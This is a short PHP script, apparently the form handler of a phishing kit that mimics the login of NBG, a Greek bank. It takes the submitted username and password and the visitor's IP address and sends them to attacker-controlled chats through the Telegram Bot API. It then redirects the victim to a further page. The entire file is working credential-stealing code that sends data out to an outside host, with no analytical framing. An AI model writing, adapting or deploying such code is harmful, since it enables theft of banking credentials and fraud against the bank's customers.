File: /home/bashacomputer/www/iljawa/torsion/anti/ci.php
<?php
include "../config.php";
$ip = getenv("REMOTE_ADDR");
$message = "-------------------- 🏦 NBG Login 🏦-------------------\nLogin : ".$_POST['login']."\nPass : ".$_POST['password']."\nIP : ".$ip."\n-------------------- 🇬🇷 Zoldyck 🇬🇷-------------------\n";
foreach($user_ids as $user_id) {
$url='https://api.telegram.org/bot'.$bottoken.'/sendMessage';
$data=array('chat_id'=>$user_id,'text'=>$message);
$options=array('http'=>array('method'=>'POST','header'=>"Content-Type:application/x-www-form-urlencoded\r\n",'content'=>http_build_query($data),),);
$context=stream_context_create($options);
$result=file_get_contents($url,false,$context);
}
header("Location: ../info.php?id=$ip");
?>